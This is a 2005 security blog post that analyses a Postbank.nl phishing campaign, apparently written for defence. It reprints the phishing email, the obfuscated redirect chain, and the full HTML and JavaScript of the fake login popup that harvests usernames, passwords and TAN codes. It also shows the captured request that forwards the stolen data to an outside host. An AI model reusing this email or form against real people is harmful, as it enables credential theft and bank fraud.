Analysis: Postbank.nl Phishing Scam

Vincent 'rastakid' van Scherpenseel - SYN-ACK.org - 6 June 2005

Introduction:
I receive lots of phishing e-mail daily, and most of them are directly recognized as 'spam' and thus move to my spam folder immediately. The ones which don't get recognized correctly are deleted by me manually upon arrival. Browsing through my spam folder today, I came across a scam which tried to trick people into giving up their Postbank.nl credentials. I was intriged by this particular piece of mud by the fact that it was the first time I saw a Postbank scam. Postbank is one of the largest banks operating in The Netherlands, and is also the one with the worst security meassures in place. While all other banks work with digital tokens (or random readers, as they're called) Postbank still holds on to a username/password login and TAN codes login. Postbank clients can view their account balance using only their username and password and are only required to enter a TAN code when they want to make a transaction. Everytime a client runs out of TAN codes he/she receives a new batch.
Another way of telebanking with Postbank is the use of Girotel Online. Clients have to supply their Girotelnumber, codenumber and GIN code to have full access to their account.

This analysis is only looking at the technical side of the scam. Although I think my analysis gives some pointers to who and where the scammers may be, it was written to look at how this particular scam is done. A couple of hours after I started writing this analysis the scam already received big media attention here in The Netherlands. It was featured on big news sites and radio broadcasts after the government CERT (Computer Emergency Response Team) released a warning about it. Note that there are several variations on the scam e-mail floating around, pointing to different websites. I decided to only analyse the e-mail I received myself.

The e-mail:
Let's start off with the e-mail I received. Here is the full version, only changes made are plain/text to HTML conversion, excessive newline removal, my private e-mail address hiding and malicious url de-linking.

Return-Path: <BenedettaBruno@postbank.nl>
Received: from vas02.wanadoo.nl (vas02.wanadoo.nl [194.134.35.217])
by pop1.euronet.nl (Postfix) with ESMTP id 46E662ACBCA
for <p54227100@pop1.euronet.nl>; Sat, 4 Jun 2005 04:04:07 +0200 (MET DST)
Received: from localhost (localhost.localdomain [127.0.0.1])
by vas02.wanadoo.nl (Postfix) with ESMTP id 37CB92A9561
for <p54227100@pop1.euronet.nl>; Sat, 4 Jun 2005 04:04:07 +0200 (CEST)
Received: from vas02.wanadoo.nl ([127.0.0.1])
by localhost (vas02.wanadoo.nl [127.0.0.1]) (amavisd-new-wb5, port 10024)
with ESMTP id 12540-53 for <p54227100@pop1.euronet.nl>;
Sat, 4 Jun 2005 04:04:05 +0200 (CEST)
Received: from mx1.euronet.nl (mx1.euronet.nl [194.134.35.134])
by vas02.wanadoo.nl (Postfix) with ESMTP id 7BCB92A9555
for <************@euronet.nl>; Sat, 4 Jun 2005 04:04:05 +0200 (CEST)
Received: from 132-8.200-68.tampabay.res.rr.com (132-8.200-68.tampabay.res.rr.com [68.200.8.132])
by mx1.euronet.nl (Postfix) with SMTP id 9359C58320
for <************@euronet.nl>; Sat, 4 Jun 2005 03:56:41 +0200 (MEST)
Message-ID: <173a01c5649e$054029eb$d36eefa1@postbank.nl>
From: Postbank.nl <BenedettaBruno@postbank.nl>
To: ************@euronet.nl
Subject: ***SPAM*** =?iso-8859-1?B?UG9zdGJhbmsgRW1haWwgVmVyaWZpY2F0aW9uIC0gc2NoZXJwZW5zZWVsQGV1cm9u?=
=?iso-8859-1?B?ZXQubmw=?=
Date: Sun, 29 May 2005 22:32:26 +0000
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="----=_NextPart_000_0000_42715370.3CB1ABCF"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express V6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
X-Virus-Scanned: Wanadoo VAS
X-Spam-Status: Yes, hits=6.5 tagged_above=4.9 required=4.9 tests=BAYES_44,
CLICK_BELOW, DATE_IN_PAST_96_XX, FORGED_OUTLOOK_TAGS, HTML_MESSAGE,
HTTP_EXCESSIVE_ESCAPES, RCVD_IN_LSORBS
X-Spam-Level: *******
X-Spam-Flag: YES
X-UIDL: 18d4c6eb5308141f578487627c916740
Status: R
X-Status: NC
X-KMail-EncryptionState:
X-KMail-SignatureState:
X-KMail-MDN-Sent:

This is a multi-part message in MIME format.

------=_NextPart_000_0000_42715370.3CB1ABCF
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_EF4ABF4E.C7EC9C49"

------=_NextPart_001_0001_EF4ABF4E.C7EC9C49
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

------=_NextPart_001_0001_EF4ABF4E.C7EC9C49
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Dear Postbank Customer,

This email was sent by the Postbank server to verify your e-mail address. You must complete this process by
clicking on the link below and entering in the small window your Postbank online access details. This is done for
your protection - because some of our members no longer have access to their email addresses and we must verify it.
To verify your e-mail address, click on the link below:

<a href="http://www.google.es/url?q=http://go.msn.com/HML/1/5.asp?target=http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/" target=_blank>http://www.postbank.nl/gRK6QnraG6FTLfFmTNNbX68U7rj8Q22oyqyIKv8qBXCeGv0TJYa0w9g6c6wih2g3</a>

------=_NextPart_001_0001_EF4ABF4E.C7EC9C49--

------=_NextPart_000_0000_42715370.3CB1ABCF--

As you can see has the scam mail been marked as spam by the SpamAssassin software at my ISP's (Wanadoo.nl) mailserver. The reasons are:

BAYES_44, CLICK_BELOW, DATE_IN_PAST_96_XX, FORGED_OUTLOOK_TAGS, HTML_MESSAGE,HTTP_EXCESSIVE_ESCAPES, RCVD_IN_LSORBS

Which translated to human readable format reads: the e-mail has a Bayesian spam probability of 44 to 50%, the author asks the reader to click on a link below, the e-mail is dated more than 96 hours ago, the e-mail contains forged Outlook tags to resemble authentic, the e-mail is written in HTML instead of plain/text, the body contains unnecessary %-escapes in an URL and the sender is listed in the SORBS (Spam and Open Relay Blocking System) blacklist.

The e-mail was sent from a machine named 132-8.200-68.tampabay.res.rr.com which resolves to 68.200.8.132. The 'tampabay' part in the hostname most probably means that the machine is located in Tampa Bay, Florida, USA. The machine didn't reply to ICMP echo request (ping) at the time of writing. Portscanning the machine for known abused ports (25/smtp, 80/http, 1080/socks, 3128/squid-http, 8080/http-proxy) resulted in an 'all ports filtered' message. The owner of rr.com is Road Runner, one of the largest cable broadband ISPs in the United States and part of the Time Warner network. Road Runner does however offer dial-up, but that's mostly for users in need of remote access to the Road Runner network. My best guess is that this message was either send through this machine because it is or was a mis-configured proxy server, an open smtp relay, an trojaned botnet victim or because it has an open wifi access point attached to it. Where the last one narrows the sender to a certain geographical location: Tampa Bay, Florida, USA.

Last thing we look at before moving to the body of the message is the 'From' header: Postbank.nl <BenedettaBruno@postbank.nl>. Benedetta Bruno seems an Italian name. All the scam e-mails were sent with Italian names.

Okay, let's take a look at the body part. The first thing that comes to mind is the fact that the e-mail was not send in correctly HTML format. My Linux based e-mail client Kmail, part of the Kontact groupware suite, didn't recognize this message as an HTML message and therefor didn't allow me to view it accordingly. The reason herefor is probably the fact that the body is encapsulated in several MIME headers. It's a malformed multi-part message.

The message asks the Postbank client (or actually any receiver, since I'm not a Postbank client) in English to verify their e-mail address by clicking on the provided link and entering their Postbank login credentails. The scammers would probably have more success if the message would've been written in Dutch, so I guess that rules out that they're native Dutch speakers. Let's take a closer look at that link:

<a href="http://www.google.es/url?q=http://go.msn.com/HML/1/5.asp?target=http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/" target=_blank>http://www.postbank.nl/gRK6QnraG6FTLfFmTNNbX68U7rj8Q22oyqyIKv8qBXCeGv0TJYa0w9g6c6wih2g3</a>

If a victim's e-mail client renders the HTML code correctly he/she would only see the 'http://www.postbank.nl/gRK6QnraG6FTLfFmTNNbX68U7rj8Q22oyqyIKv8qBXCeGv0TJYa0w9g6c6wih2g3' part. The code behind the Postbank home URL part has no meaning on the click since the anchor points to somewhere whole else. My guess is that it was just added to look authentic. Anyway, the last part of the link is not the malicious part: it's all about the part held in the href statement. As we can see the senders used two in-link redirections: first the victim goes to the Spanish Google, which redirects him/her to MSN, which then redirects the victim to the final link destination: 'http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/'. The Google and MSN prefixes were probably added to trick the victim into thinking he has arrived on a legitimate location: the victim recognizes the words Google and MSN and doesn't pay a lot attention to the 'strange codes' at the end of the URL.

Time to decode the final link destination. I coded together a very simple perl script based on Glenn Fleishman's code which I used to decode the URL.

Enter URL: http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/

Do you want to [E]ncode or [D]ecode: D

http://hkschf   o.d%    a.R%    U/

The URL:
Removing the whitespace and the excessive %-signs we get: http://hkschfo.da.RU/. Da.ru is a Russian free URL service where you can freely register a http://yourname.da.ru URL. Next thing to do is requesting the HTTP headers from hkschfo.da.ru:

[vincent@matrix sandbox]$ telnet hkschfo.da.ru 80

Trying 195.161.113.135...

Connected to hkschfo.da.ru (195.161.113.135).

Escape character is '^]'.

HEAD / HTTP/1.0

Host:hkschfo.da.ru

HTTP/1.1 302 Found

Date: Sat, 04 Jun 2005 18:11:14 GMT

Server: Apache/1.3.9 (Unix) da.ru/1.2/DeathMatch

Location: http://dlkrexae.nm.ru/

Connection: close

Content-Type: text/html

As you can see the visitor is directly redirected via a 302 to dlkrexae.nm.ru. Nm.ru is also a free URL service but unfortunately I don't speak Russian so I can't exactly find out more about it. This is the third redirection! Let's examine the HTTP headers of dslkrexae.nm.ru:

[vincent@matrix sandbox]$ telnet dlkrexae.nm.ru 80

Trying 212.48.140.151...

Connected to dlkrexae.nm.ru (212.48.140.151).

Escape character is '^]'.

HEAD / HTTP/1.0

Host:dlkrexae.nm.ru

HTTP/1.1 200 OK

Date: Sat, 04 Jun 2005 17:38:11 GMT

Server: Apache/1.3.27 (Unix)

Last-Modified: Sat, 04 Jun 2005 11:44:45 GMT

ETag: "d283dc-1c8-42a1942d"

Accept-Ranges: bytes

Content-Length: 456

Connection: close

Content-Type: text/html; charset=windows-1251

Finally, real content. Or not? Let's view the source:

<HTML><HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.postbank.nl/">
<SCRIPT language=JavaScript>
// ensure top window
if (window != top)
{
top.location = window.location;
}
</SCRIPT>
<title></title></HEAD>
<BODY bgColor=#ffffff onload="window.open('welcome3.html', 'miqoo9',
'top=150,left=370,width=430,height=440,toolbar=no,location=no,scrollbars=no,resizable=no')">
</BODY></HTML>
<textarea style=display:none>

Jackpot! This is the trick: using JavaScript a popup window is spawned on pageload and directly after loading the visitor is redirected to the fifth and final destination: the website of Postbank, www.postbank.nl. The page which is loaded within the popup windows is http://dlkrexae.nm.ru/welcome3.html:

<html lang="en">

<head>

<title>E-mail Verification - Postbank.nl</title>

<link rel="stylesheet" type="text/css" href='https://ib.national.com.au/nabib/scripts/nabstyle.css?id=008'>

</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<center>
<br>
<table width="430" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="150" valign="top"></td>
<td width="10">  </td>
<td width="100%">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="left"><center><img src=sim.gif></center></td>
</tr>
</table>
<hr size="1">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>

<form action="obr2.html" method="get" name=formulario>
<input type="hidden" name="go" value="hm">
<br>
<table width="100%" border="0" cellspacing="0" cellpadding="0">

<tr>
<td width="65%" align="left" valign="middle" colspan=2><center><font size=3 color=black>For Mijn Postbank.nl Clients:</font></center></td>
</tr>

<tr>
<td width="65%" align="left" valign="middle"><font size=3 color=black>   UserID (Gebruikersnaam): </font></td>
<td align="left" valign="bottom"><input type="text" name="bankn" size="17" maxlength="30" class="inputtext" AUTOCOMPLETE="OFF" value=""></td>
</tr>
<tr><td height="12"> </td></tr>
<tr>
<td width="65%" align="left" valign="middle"><font size=3 color=black>   Password (Wachtwoord): </font></td>
<td align="left" valign="bottom"><input type="password" name="word" size="17" maxlength="30" class="inputtext" AUTOCOMPLETE="OFF" value=""></td>
</tr>
<tr><td height="12"> </td></tr>

<tr>
<td width="65%" align="left" valign="middle" colspan=2><center><font size=3 color=black>For ALL Clients - enter your next three TAN codes:</font></center></td>
</tr>

<tr>
<td align="left" valign="bottom" colspan=2>
<center>
<table>
<tr>
<td align="center"><font size=2>volg N</font></td><td align="center"><font size=2>TAN</font></td><td align="center">   </td><td align="center"><font size=2>volg N</font></td><td align="center"><font size=2>TAN</font></td><td align="center">   </td><td align="center"><font size=2>volg N</font></td><td align="center"><font size=2>TAN</font></td>
</td>
</tr>
<tr>
<td align="center"><input type="text" name="vol1" size="4" maxlength="4" class="inputtext" AUTOCOMPLETE="OFF"
value=""></td><td align="center"><input type="text" name="pass1" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center">   </td><td align="center"><input type="text" name="vol2" size="4" maxlength="4" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"><input type="text" name="pass2" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center">   </td><td align="center"><input type="text" name="vol3" size="4" maxlength="4" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"><input type="text" name="pass3" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""><input type="hidden" name="ve" value="se"></td>
</td>
</tr></table>
</center>

</td>
</tr>

<tr><td height="12"> </td></tr>

<tr>
<td width="65%" align="left" valign="middle" colspan=2><center><font size=3 color=black>For Girotel Online Clients:</font></center></td>
</tr>
<tr>
<td align="left" valign="bottom" colspan=2>
<center>
<table>
<tr>
<td align="center"><font size=2>Girotelnummer</font></td><td align="center">   </td><td align="center"><font size=2>Codenummer</font></td><td align="center">   </td><td align="center"><font size=2>GIN-code</font></td>
</td>
</tr>
<tr>
<td align="center"><input type="text" name="girn" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center">   </td><td align="center"><input type="password" name="conum" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center">   </td><td align="center"><input type="password" name="gcod" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td></td>
</td>
</tr></table>
</center>

</td>
</tr>

<tr><td height="12"> </td></tr>

<tr>
<td width="57%"> </td>
<td align="right" class="body">
<input type="button" name="loginButton" value=" Verify " onclick=javascript:aceptar()>
</td>
</tr>
</table>
</form>

</td>
</tr>
</table>
</td>
<td width="10">  </td>
</tr>
</table>

</center>
</body>
<script>
function Submitir() {
document.formulario.submit();
}
function aceptar() {

if (document.formulario.vol1.value != '')
{
if (document.formulario.pass1.value != '')
{
if (document.formulario.vol2.value != '')
{
if (document.formulario.pass2.value != '')
{
if (document.formulario.vol3.value != '')
{
if (document.formulario.pass3.value != '')
{

Submitir();
}

else
{ alert("You need to enter your third VALID NEXT TAN code!");
document.formulario.pass3.focus();
}
}

else
{
alert("You need to enter Volgnummer of your third VALID NEXT TAN code!");
document.formulario.vol3.focus();
}
}

else
{
alert("You need to enter your second VALID NEXT TAN code!");
document.formulario.pass2.focus();
}
}

else
{
alert("You need to enter Volgnummer of your second VALID NEXT TAN code!");
document.formulario.vol2.focus();
}
}

else
{
alert("You need to enter your first VALID NEXT TAN code!");
document.formulario.pass1.focus();
}
}

else
{
alert("You need to enter Volgnummer of your first VALID NEXT TAN code!");
document.formulario.vol1.focus();
}
}

</script>
</html>
<textarea style=display:none>

This is the page where the Postbank client is asked to enter his/her username, password and the three next TAN codes. During my analysis I discovered that a new section was added to the page since the first time I saw it: the scam has now also 'support' for Postbank Girotel Online clients too, asking them for their Girotelnumber, codenumber and GIN code. Using these credentials they scammers have full access to the Postbank client's Girotel account. The fact that this was added hours after the first e-mails were sent means that the scammers are still actively working to perfect their scam.

Let's take a look at the source. The first thing that jumps in the eye is the include of a stylesheet from a https resource:

This is very odd: the stylesheet defines lots of classes which aren't used within the welcome3.html page. The domain national.com.au belongs to the National Australia Bank, a business bank located in Australia, New Zealand and the United Kingdom. Why would the scammers use a stylesheet which is so bloated with make up tags they aren't going to use? My guess: since the stylesheet is retrieved via a secured HTTP transfer some browser may entitle this page as 'safe'. Victims will more easily fall for the trick if they see a 'secure' little lock within their browser, even more if the connection is to a bank. It doesn't matter to Firefox users though: Firefox doesn't recognize the page as secure. I also tested it with the latest Internet Explorer and that browser didn't recognize the page as secure either.
I choose not to include the stylesheet within this document since I didn't think it was relevant enough.

What happens here is the the form content gets send via a HTTP GET request to the page obr2.html. Along with the user filled-in data there's a hidden field: 'go' containing the value 'hm'. This value is static, it didn't change when I re-requested the page. I know that the scammers have set up many free URL redirects so this may be a way for them to recognize where the data came from and perhaps to find out if a redirect is down.

What we also see is that the JavaScript functions have Spanish names: function Submitir(), document.formulario.submit() and function aceptar(). This could mean that the scammers are speaking Spanish, but the code could also be taken from an example found on the Internet.

The transaction:
Time to fill out some paperwork. Surfing through an anonymous open proxy server I entered some bogus information in the text boxes while I had a packetsniffer running on my gateway. This is what came through:

	GET http://dlkrexae.nm.ru/obr2.html?go=hm&bankn=jansen343&word=password007&vol1=23&pass1=452442&vol2=24&pass2=324233&vol3=25&pass3=234432&ve=se&girn=&
conum=&gcod= HTTP/1.1

All the data I filled in is send using a GET request to the page obr2.html, as expected. This is how obr2.html's source looks like:

The page obr2.html displays two 'images' and forwards the victim 1 second after pageload to another page: rezult.html. The sources of the images are obfuscated through HTML encoding. Translated, the image tags read:

What this does is simple: the HTML loads two CGI scripts as images. This is where the data gets send to the scammers: along with the request for the two 'images' the Referer is send. Within this referer are the fake Postbank credentials I entered. Unfortunately I'm not able to take a look at the CGI scripts since CGI is a server-side language, meaning that only the script execution output gets send back. These CGI scripts didn't generate any output other than a HTTP 200 OK code, meaning that the CGI scripts are still alive, otherwise a HTTP 404 File Not Found or some Forbidden error would probably be issued. The data is probably e-mailed from the CGI scripts to the scammers. The reason two CGI scripts were included is probably for redundancy. This is one of the two requests logged by my packetsniffer:

	GET http://z33431.infobox.ru/cgi-bin/result/img10.cgi HTTP/1.1

	Host: z33431.infobox.ru

	User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4

	Accept: image/png,*/*;q=0.5

	Accept-Language: en-us,en;q=0.5

	Accept-Encoding: gzip,deflate

	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

	Keep-Alive: 300

	Proxy-Connection: keep-alive

	Referer: http://dlkrexae.nm.ru/obr2.html?go=hm&bankn=jansen343&word=password007&vol1=23&pass1=452442&vol2=24&pass2=324233&vol3=25&pass3=234432&ve=se&girn=
&conum=&gcod=

The other request was completely identical, except for the hostname (z33455.infobox.ru instead of z33431.infobox.ru). Infobox.ru is a webhosting company which doesn't seem to offer URLs free of charge but it does offer a one-month free trial period. Chances are big this is what the scammers used.

Alright, on to the final result. As said, 1 second after pageload (so the images can be loaded) the victim is forwarded to rezult.html. This is the source code of rezult.html:

<html>
<head>
<title>Your E-Mail Was Verified.</title>
</head>
<body>
<center>
<font size=3 color=red>
<br><br><br><br><b>Thank you.
</font>
<font size=3>
</b><br><br><b>Your E-Mail Address Was<br>Successful Verified.</b><br>
</font>
</center>
</body>
</html>
<textarea style=display:none>

Ahh.. Doesn't that give you a safe feeling?

Conclusion:
In this analysis I looked at the technical side of one specific phishing scam: the Postbank.nl scam. I was more interested in knowing how the scammers did the trick than in who did it. Also, I don't have the resources to track down the scammers. Because of their use of free services and a lot of redirects I'm afraid it's really hard to track them down. We've seen many international references: the e-mail was sent from Tampa Bay, Florida, USA, with an Italian sender name, the Javascript code was written in Spanish, the Google redirect used was on the Spanish Google domain and all free URL forwarders were Russia based companies.

What we've seen is basicly just the good old social engineering trick in combination with several techniques to trick victims into clicking. It began with an e-mail asking the recipient to very his/her e-mail address by clicking on the link below. The link had two in-link redirects, from Google to MSN and then finally to a free .RU address. From that .RU address the victim got sent to another free .RU address where a pop-up was spawned asking the victim for his/her credentials while the Postbank.nl website was displayed in the back. All in all this looks very authentic to the average user. The only thing that could lead to suspicion is the fact that the e-mail was written in English while Postbank is a Dutch bank.

One thing I found interesting was the fact that the victim was redirected so many times. The link in the e-mail seemed like a decent link, pointing to Postbank.nl, while in fact the href tag pointed somewhere else. But the value of the href tag was still not really suspicious: a link containing Google, MSN and some 'strange code' can't be that wrong, can it?
We've also seen two uses of obfuscating: firstly the decimal to hexadecimal encoded URL in the e-mail and secondly the encoded HTML which triggered the CGI scripts to send the victim's credentials somewhere else.
The one thing that still boggles my mind is why the stylesheet in the popup is included from an external site using a HTTPs connection, while the make up tags within the stylesheet aren't used! I still think it's done to trick the user into thinking he's entering his/her credentials in a secured form, but I don't have any evidence of this. I tested it on the latest Firefox and the latest Internet Explorer but both browsers considered the pages as non-secure.

Two days after receiving the e-mail of this scam the trick is still working, albeit a little different: the redirects have changed. Most probably some of the redirects went down after abuse complaints.

Is Postbank to blame for this scam? Partially yes, I think. Security mistake number one is of course their ancient way of e-banking login. A username and password is sufficient to view an account balance. TAN codes are enough to make transactions. Postbank should follow the other banks in The Netherlands and start using a digital token (random reader) to authenticate their clients.
Secondly, although they've posted a warning against phishing on their frontpage, I don't think it's visible enough. In red letters the warning reads "Belangrijk bericht als u Mijn Postbank.nl of Girotel Online heeft", translated: "Important message for My Postank.nl or Girotel Online users". Why not whitelisting referers? If a users visits the Postbank.nl page from an unknown referer add some extra warning like a pop-up window. Yes, I know a lot of people are using pop-up blocking software, but if that's the case they wouldn't have seen the 'Enter your credentials' pop-up in the first place. Then have some people verifying unknown referals and white- or blacklist those.

Hopefully people and companies are getting more aware of the dangers of phishing through media attention. There are still a lot of things companies can do to limit the change of abuse. One initiative I've been thinking about too and really is a big step in the right direction is Netcraft's anti phishing plug-in for Firefox. Using blacklists users are warned when they arrive on a phishing website.

Well, this is it. I hope you found this analysis interesting. If you have any questions or comments please drop me an e-mail at rastakid [at] syn-ack [dot] org.

Update 7 June 2005:
I'm glad to have received a lot of positive feedback on my analysis and would like to thank everyone for their interest. Special thanks go out to Moritz Naumann and Frans E. for their explanation of the SORBS list. I didn't know it was a special SpamAssassin rule added by my ISP Wanadoo. After releasing this analysis I forwarded it to Infobox.ru where the CGI scripts were hosted and they immediately closed the accounts. Kudos to Infobox.ru, I wish more companies were as active as they are. I encourage anyone who finds more free URL redirects used by scammers to contact the appropriate abuse desks to close the phishing sites as quickly as possible.
But the big news is that Postbank has taken active actions against this particular scam: they included anti pop-up code within their website (http://www.postbank.nl/), here's the code:

What this does is opening a new window (pop-up) with the same name as the one the phishers used and then immediately close it. This is very effective, but what if the scammers change the name from 'myqos9' to something else? Anyway, this is really good work from Postbank. Now if they would only get rid of those TAN codes...

(C) Vincent 'rastakid' van Scherpenseel - SYN-ACK.org - 6 June 2005
You're allowed to distribute, edit, use for education or do whatever with this papers as long as the credits to the original author remain visible.

ServerFloor
Reliable and easy to use server monitoring. Various tests supported including Spam Blacklist Testing. Alerts are sent through e-mail or sms.